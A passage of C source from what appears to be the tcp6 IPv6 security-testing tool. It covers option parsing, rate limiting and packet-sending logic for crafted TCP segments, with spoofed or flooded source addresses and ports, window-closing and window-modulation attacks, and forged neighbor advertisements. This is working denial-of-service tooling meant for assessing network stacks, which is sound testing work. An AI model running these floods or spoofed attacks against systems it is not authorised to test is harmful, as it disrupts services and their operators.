link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Payload Size*/ rhbytes= atoi(optarg); rhbytes_f= 1; break; case 'o': /* TCP Source Port */ srcport= atoi(optarg); srcport_f= 1; break; case 'a': /* TCP Destination Port */ dstport= atoi(optarg); dstport_f= 1; break; case 'X': if(strncmp(optarg, "auto", 4) == 0){ tcpflags_auto_f=1; break; } charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=1; break; case 'q': /* TCP Sequence Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpseq = ul_res; tcpseq_f=1; } break; case 'Q': /* TCP Acknowledgement Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpack = ul_res; tcpack_f=1; } break; case 'V': /* TCP Urgent Pointer */ tcpurg= atoi(optarg); tcpurg_f= 1; break; case 'w': /* TCP Window */ tcpwin= atoi(optarg); tcpwin_f=1; break; case 'W': /* TCP Window */ if(strncmp(optarg, "close", MAX_CMDLINE_OPT_LEN) == 0 || strncmp(optarg, "closed", MAX_CMDLINE_OPT_LEN) == 0){ window= WIN_CLOSED; } else if(strncmp(optarg, "modulate", MAX_CMDLINE_OPT_LEN) == 0 || strncmp(optarg, "modulation", MAX_CMDLINE_OPT_LEN) == 0){ window= WIN_MODULATE; } else{ puts("Error: Unknown window option ('-W')"); exit(EXIT_FAILURE); } window_f=1; break; case 'M': sscanf(optarg, "%u:%u:%u:%u", &win1_size, &time1_len, &win2_size, &time2_len); winmodulate_f= 1; break; case 'N': /* Do not ack data */ ackdata_f= 0; break; case 'n': /* Do not ack flags */ ackflags_f= 0; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'F': /* Flood source addresses */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of source addresses in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'T': /* Flood source ports */ nports= atoi(optarg); if(nports == 0){ puts("Invalid number of source ports in option -T"); exit(EXIT_FAILURE); } floodp_f= 1; break; case 'f': rand_src_f=1; break; case 'R': rand_link_src_f=1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'r': if( Strnlen(optarg, LINE_BUFFER_SIZE-1) >= (LINE_BUFFER_SIZE-1)){ puts("tcp6: -r option is too long"); exit(EXIT_FAILURE); } sscanf(optarg, "%lu%s", &rate, line); line[LINE_BUFFER_SIZE-1]=0; if(strncmp(line, "pps", 3) == 0) pps_f=1; else if(strncmp(line, "bps", 3) == 0) bps_f=1; else{ puts("tcp6: Unknown unit of for the rate limit ('-r' option). Unit should be 'bps' or 'pps'"); exit(EXIT_FAILURE); } break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'v': /* Be verbose */ (idata.verbose_f)++; break; case 'p': /* Probe mode */ probe_f=1; break; case 'x': /* Number of retrnasmissions */ retrans= atoi(optarg); retrans_f=1; break; case 'Y': if(strncmp(optarg, "dump", MAX_CMDLINE_OPT_LEN) == 0){ debug= DEBUG_DUMP; } else if(strncmp(optarg, "script", MAX_CMDLINE_OPT_LEN) == 0){ debug= DEBUG_SCRIPT; } else{ puts("Error: Unknown open mode in '-Y' option"); exit(EXIT_FAILURE); } debug_f=1; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("tcp6 needs root privileges to run."); exit(EXIT_FAILURE); } srandom(time(NULL)); /* If the flood option ("-F") has been specified, but no prefix has been specified, assume a /64 prefix. */ if(floods_f && !idata.srcprefix_f){ idata.srcpreflen=64; } if(idata.srcprefix_f && !floods_f && loop_f){ floods_f=1; nsources= 1; } if(!(idata.dstaddr_f) && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(rhbytes_f && data_f){ puts("Cannot set '--data' and '--payload-size' at the same time"); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } else if(listen_f){ puts("Must specify a network interface when employing the 'listenging' mode"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, (idata.dstaddr_f?LOAD_SRC_NXT_HOP:LOAD_PCAP_ONLY)) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(data_f){ data[datalen]=0; if(!string_escapes(data, &datalen, DATA_BUFFER_LEN-1)){ puts("Error in data string option ('-Z')"); exit(EXIT_FAILURE); } data[datalen]=0; } if(!floods_f) nsources=1; if(!floodp_f) nports=1; if(!sleep_f) nsleep=1; if(sleep_f && (pps_f || bps_f)){ puts("Cannot specify a rate-limit (-r) and a sleep time at the same time"); exit(EXIT_FAILURE); } if(pps_f && bps_f){ puts("Cannot specify a rate-limit in bps and pps at the same time"); exit(EXIT_FAILURE); } if(pps_f){ if(rate < 1) rate=1; pktinterval= 1000000/rate; } if(bps_f){ packetsize= MIN_IPV6_HLEN + sizeof(struct tcp_hdr) + rhbytes; for(i=0; i < ndstopthdr; i++) packetsize+= dstopthdrlen[i]; for(i=0; i < ndstoptuhdr; i++) packetsize+= dstoptuhdrlen[i]; for(i=0; i < nhbhopthdr; i++) packetsize+= hbhopthdrlen[i]; if(fragh_f) packetsize+= sizeof(struct ip6_frag); if(rate == 0 || ((packetsize * 8)/rate) <= 0) pktinterval= 1000000; else pktinterval= ((packetsize * 8)/rate) * 1000000; } /* We Default to 1000 pps */ if(!pps_f && !bps_f) pktinterval= 1000; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) idata.max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else idata.max_packet_size = idata.mtu; /* * If we are going to send packets to a specified target, we must set some default values */ if(idata.dstaddr_f){ if(!tcpflags_auto_f && !tcpflags_f && !tcpopen_f && !tcpclose_f) tcpflags= tcpflags | TH_ACK; if(!tcpack_f) tcpack= random(); if(!tcpseq_f) tcpseq= random(); if(!srcport_f) srcport= random(); if(!dstport_f) dstport= random(); if(!tcpurg_f) tcpurg= 0; } /* By default, we randomize the TCP Window */ if(!tcpwin_f) tcpwin= ((u_int16_t) random() + 1500) & (u_int16_t)0x7f00; if(!rhbytes_f) rhbytes=0; if(idata.verbose_f){ print_attack_info(&idata); } /* Set filter for IPv6 packets (find_ipv6_router() set its own filter fore receiving RAs) */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCPIPV6_NS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Set initial contents of the attack packet */ init_packet_data(&idata); addr_key= random(); if(sleep_f) pktinterval= (nsleep * 1000000)/(nsources * nports); timeout.tv_sec= pktinterval / 1000000 ; timeout.tv_usec= pktinterval % 1000000; stimeout= timeout; if(window_f){ if(window == WIN_MODULATE && !winmodulate_f){ win1_size= WIN_MODULATE_CLOSED_SIZE; time1_len= WIN_MODULATE_CLOSED_LEN; win2_size= WIN_MODULATE_OPEN_SIZE; time2_len= WIN_MODULATE_OPEN_LEN; } } if(window_f && window == WIN_MODULATE){ if(gettimeofday(&wmtimeout, NULL) == -1){ if(idata.verbose_f) perror("tcp6"); exit(EXIT_FAILURE); } tcpwinm= win1_size; } if(probe_f){ end_f=0; if(!dstport_f) dstport= 80; if(!srcport_f) srcport= 50000 + random() % 15000; /* We select ports from the "high ports" range */ if(!rto_f) rto=1; if(!retrans_f) retrans=0; retr=0; retrans++; FD_ZERO(&sset); FD_SET(idata.fd, &sset); lastprobe.tv_sec= 0; lastprobe.tv_usec=0; while(!end_f){ if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("tcp6"); exit(EXIT_FAILURE); } if(is_time_elapsed(&curtime, &lastprobe, 1) && retr < retrans){ retr++; lastprobe= curtime; send_packet(&idata, NULL, NULL); } if(is_time_elapsed(&curtime, &lastprobe, rto) && retr >= retrans){ end_f=1; break; } rset= sset; timeout.tv_usec=0; timeout.tv_sec= (rto < 1)?rto:1; if((sel=select(idata.fd+1, &rset, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } if(sel){ if(FD_ISSET(idata.fd, &rset)){ /* Read a packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_tcp= (struct tcp_hdr *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_ns= (struct nd_neighbor_solicit *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; pkt_tcp_flags= pkt_tcp->th_flags; /* Check that we are able to look into the IPv6 header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; if(is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.srcaddr))){ continue; } if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } if(pkt_tcp->th_sport != htons(dstport)){ continue; } if(pkt_tcp->th_dport != htons(srcport)){ continue; } /* The TCP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; printf("PROBE:RESPONSE:%s%s%s%s%s%s\n", ((pkt_tcp_flags & TH_FIN)?"F":""), \ ((pkt_tcp_flags & TH_SYN)?"S":""), \ ((pkt_tcp_flags & TH_RST)?"R":""), ((pkt_tcp_flags & TH_PUSH)?"P":""),\ ((pkt_tcp_flags & TH_ACK)?"A":""), ((pkt_tcp_flags & TH_URG)?"U":"")); exit(0); } } } puts("PROBE:TIMEOUT:"); exit(0); } /* Fire a TCP segment if an IPv6 Destination Address was specified */ if(!listen_f && idata.dstaddr_f){ if(loop_f){ if(idata.verbose_f) printf("Sending TCP segments every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); } do{ send_packet(&idata, NULL, NULL); if(loop_f && (sel=select(0, NULL, NULL, NULL, &timeout)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } }while(loop_f); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); exit(EXIT_SUCCESS); } else if(listen_f){ if( (idata.fd= pcap_fileno(idata.pfd)) == -1){ puts("Error obtaining descriptor number for pcap_t"); exit(EXIT_FAILURE); } FD_ZERO(&sset); FD_SET(idata.fd, &sset); if(idata.verbose_f){ print_filters(&idata, &filters); puts("Listening to incoming IPv6 messages..."); } while(listen_f){ rset= sset; timeout= stimeout; if((sel=select(idata.fd+1, &rset, NULL, NULL, ((floods_f || floodp_f) && !donesending_f)?(&timeout):NULL)) == -1){ if(errno == EINTR){ continue; } else{ puts("Error in select()"); exit(EXIT_FAILURE); } } /* If there are some bits set, we need to check whether it's time to send packets */ if(sel){ if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("tcp6"); exit(EXIT_FAILURE); } if(window == WIN_MODULATE){ if(tcpwinm == win1_size){ if( (curtime.tv_sec - wmtimeout.tv_sec) >= time1_len){ wmtimeout= curtime; tcpwinm = win2_size; } } else{ if( (curtime.tv_sec - wmtimeout.tv_sec) >= time2_len){ wmtimeout= curtime; tcpwinm = win1_size; } } } } if(FD_ISSET(idata.fd, &rset)){ /* Read a packet */ if((r=pcap_next_ex(idata.pfd, &pkthdr, &pktdata)) == -1){ printf("pcap_next_ex(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } else if(r == 0){ continue; /* Should never happen */ } pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata.linkhsize); pkt_tcp= (struct tcp_hdr *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_ns= (struct nd_neighbor_solicit *) ( (char *) pkt_ipv6 + MIN_IPV6_HLEN); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* Check that we are able to look into the IPv6 header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN)) continue; accepted_f=0; if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nblocklinksrc){ if(match_ether(filters.blocklinksrc, filters.nblocklinksrc, &(pkt_ether->src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblocklinkdst){ if(match_ether(filters.blocklinkdst, filters.nblocklinkdst, &(pkt_ether->dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } } if(filters.nblocksrc){ if(match_ipv6(filters.blocksrc, filters.blocksrclen, filters.nblocksrc, &(pkt_ipv6->ip6_src))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(filters.nblockdst){ if(match_ipv6(filters.blockdst, filters.blockdstlen, filters.nblockdst, &(pkt_ipv6->ip6_dst))){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } } if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(filters.nacceptlinksrc){ if(match_ether(filters.acceptlinksrc, filters.nacceptlinksrc, &(pkt_ether->src))) accepted_f=1; } if(filters.nacceptlinkdst && !accepted_f){ if(match_ether(filters.acceptlinkdst, filters.nacceptlinkdst, &(pkt_ether->dst))) accepted_f= 1; } } if(filters.nacceptsrc && !accepted_f){ if(match_ipv6(filters.acceptsrc, filters.acceptsrclen, filters.nacceptsrc, &(pkt_ipv6->ip6_src))) accepted_f= 1; } if(filters.nacceptdst && !accepted_f){ if(match_ipv6(filters.acceptdst, filters.acceptdstlen, filters.nacceptdst, &(pkt_ipv6->ip6_dst))) accepted_f=1; } if(filters.acceptfilters_f && !accepted_f){ if(idata.verbose_f>1) print_filter_result(&idata, pktdata, BLOCKED); continue; } if(idata.verbose_f>1) print_filter_result(&idata, pktdata, ACCEPTED); if(pkt_ipv6->ip6_nxt == IPPROTO_TCP){ /* Check that we are able to look into the TCP header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN + sizeof(struct tcp_hdr))){ continue; } if(idata.dstaddr_f){ if(!floods_f){ /* Discard our own packets */ if(is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.srcaddr))){ continue; } if(!is_eq_in6_addr(&(pkt_ipv6->ip6_dst), &(idata.srcaddr))){ continue; } } else{ /* Discard our own packets */ if(!is_eq_in6_addr(&(pkt_ipv6->ip6_src), &(idata.dstaddr))){ continue; } if(useaddrkey_f){ if(pkt_ipv6->ip6_src.s6_addr16[5] == (pkt_ipv6->ip6_src.s6_addr16[4] ^ addr_key) && \ pkt_ipv6->ip6_src.s6_addr16[7] == (pkt_ipv6->ip6_src.s6_addr16[6] ^ addr_key)){ continue; } if(pkt_ipv6->ip6_dst.s6_addr16[5] != (pkt_ipv6->ip6_dst.s6_addr16[4] ^ addr_key) || \ pkt_ipv6->ip6_dst.s6_addr16[7] != (pkt_ipv6->ip6_dst.s6_addr16[6] ^ addr_key)){ continue; } } } /* The TCP checksum must be valid */ if(in_chksum(pkt_ipv6, pkt_tcp, pkt_end-((unsigned char *)pkt_tcp), IPPROTO_TCP) != 0) continue; if(pkt_tcp->th_sport != htons(dstport)){ continue; } if(!floodp_f && pkt_tcp->th_dport != htons(srcport)){ continue; } } /* Send a TCP segment */ send_packet(&idata, pktdata, pkthdr); } else if(pkt_ipv6->ip6_nxt == IPPROTO_ICMPV6){ /* Check that we are able to look into the NS header */ if( (pkt_end - pktdata) < (idata.linkhsize + MIN_IPV6_HLEN + sizeof(struct nd_neighbor_solicit))){ continue; } if(idata.type == DLT_EN10MB && idata.flags != IFACE_LOOPBACK){ if(floods_f){ if(useaddrkey_f){ if(pkt_ns->nd_ns_target.s6_addr16[5] != (pkt_ns->nd_ns_target.s6_addr16[4] ^ addr_key) || \ pkt_ns->nd_ns_target.s6_addr16[7] != (pkt_ns->nd_ns_target.s6_addr16[6] ^ addr_key)){ continue; } } /* Check that the target address belongs to the prefix from which we are sending packets */ if(!match_ipv6(&(idata.srcaddr), &idata.srcpreflen, 1, &(pkt_ns->nd_ns_target))){ continue; } } else{ if(!is_eq_in6_addr( &(pkt_ns->nd_ns_target), &(idata.srcaddr)) ){ continue; } } if(send_neighbor_advert(&idata, idata.pfd, pktdata) == -1){ puts("Error sending Neighbor Advertisement"); exit(EXIT_FAILURE); } } } } if((!sel || is_time_elapsed(&curtime, &lastprobe, pktinterval)) && !donesending_f){ lastprobe= curtime; send_packet(&idata, NULL, NULL); } } exit(EXIT_SUCCESS); } if(!(idata.dstaddr_f) && !listen_f){ puts("Error: Nothing to send! (Destination Address left unspecified, and not using listening mode)"); exit(EXIT_FAILURE); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->flags != IFACE_TUNNEL && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ if((ptr+ dstoptuhdrlen[dstoptuhdrs]) > (v6buffer+ idata->mtu)){ puts("Packet too large while processing Dest. Opt. Header (Unfrag. Part)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstoptuhdr[dstoptuhdrs], dstoptuhdrlen[dstoptuhdrs]); ptr = ptr + dstoptuhdrlen[dstoptuhdrs]; dstoptuhdrs++; } } /* Everything that follows is the Fragmentable Part of the packet */ fragpart = ptr; if(fragh_f){ /* Check that we are able to send the Unfragmentable Part, together with a Fragment Header and a chunk data over our link layer */ if( (fragpart+sizeof(fraghdr)+nfrags) > (v6buffer+idata->mtu)){ puts("Unfragmentable part too large for current MTU"); exit(EXIT_FAILURE); } /* We prepare a separete Fragment Header, but we do not include it in the packet to be sent. This Fragment Header will be used (an assembled with the rest of the packet by the send_packet() function. */ bzero(&fraghdr, FRAG_HDR_SIZE); *prev_nh = IPPROTO_FRAGMENT; prev_nh = (unsigned char *) &fraghdr; } if(dstopthdr_f){ dstopthdrs=0; while(dstopthdrs < ndstopthdr){ if((ptr+ dstopthdrlen[dstopthdrs]) > (v6buffer+ idata->max_packet_size)){ puts("Packet too large while processing Dest. Opt. Header (should be using the Frag. option?)"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_DSTOPTS; prev_nh = ptr; memcpy(ptr, dstopthdr[dstopthdrs], dstopthdrlen[dstopthdrs]); ptr = ptr + dstopthdrlen[dstopthdrs]; dstopthdrs++; } } *prev_nh = IPPROTO_TCP; startofprefixes=ptr; } /* * Function: send_packet() * * Initialize the remaining fields of the TCP segment, and send the attack packet(s). */ void send_packet(struct iface_data *idata, const u_char *pktdata, struct pcap_pkthdr *pkthdr){ static unsigned int sources=0, ports=0; ptr=startofprefixes; startclose_f= 0; senddata_f= 0; if(pktdata != NULL){ /* Sending a TCP segment in response to a received packet */ pkt_ether = (struct ether_header *) pktdata; pkt_ipv6 = (struct ip6_hdr *)((char *) pkt_ether + idata->linkhsize); pkt_tcp= (struct tcp_hdr *)( (char *) pkt_ipv6 + sizeof(struct ip6_hdr)); pkt_end = (unsigned char *) pktdata + pkthdr->caplen; /* The packet length is the minimum of what we capured, and what is specified in the IPv6 Total Lenght field */ if( pkt_end > ((unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen) ) pkt_end = (unsigned char *)pkt_ipv6 + sizeof(struct ip6_hdr) + pkt_ipv6->ip6_plen; pkt_ipv6addr = &(pkt_ipv6->ip6_src); /* We don't send any packets if the Source Address of the captured packet is the unspecified address or a multicast address */ if(IN6_IS_ADDR_UNSPECIFIED(pkt_ipv6addr) || IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ return; } else{ ipv6->ip6_dst = pkt_ipv6->ip6_src; if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK) ethernet->dst = pkt_ether->src; } pkt_ipv6addr = &(pkt_ipv6->ip6_dst); /* We do not send any packets if the Destination Address of the captured packet is the unspecified address or a multicast address */ if(IN6_IS_ADDR_MULTICAST(pkt_ipv6addr) || IN6_IS_ADDR_MULTICAST(pkt_ipv6addr)){ return; } else{ ipv6->ip6_src = pkt_ipv6->ip6_dst; if(idata->type == DLT_EN10MB && idata->flags != IFACE_LOOPBACK) ethernet->src = pkt_ether->dst; } if( (ptr+sizeof(struct tcp_hdr)) > (v6buffer+ idata->max_packet_size)){ puts("Packet Too Large while inserting TCP header"); exit(EXIT_FAILURE); } /* If we are setting the flags automatically, do not respond to RST segments */ if((tcpflags_auto_f || tcpopen_f || tcpclose_f) && pkt_tcp->th_flags & TH_RST) return; tcp = (struct tcp_hdr *) ptr; bzero(tcp, sizeof(struct tcp_hdr)); tcp->th_sport= pkt_tcp->th_dport; 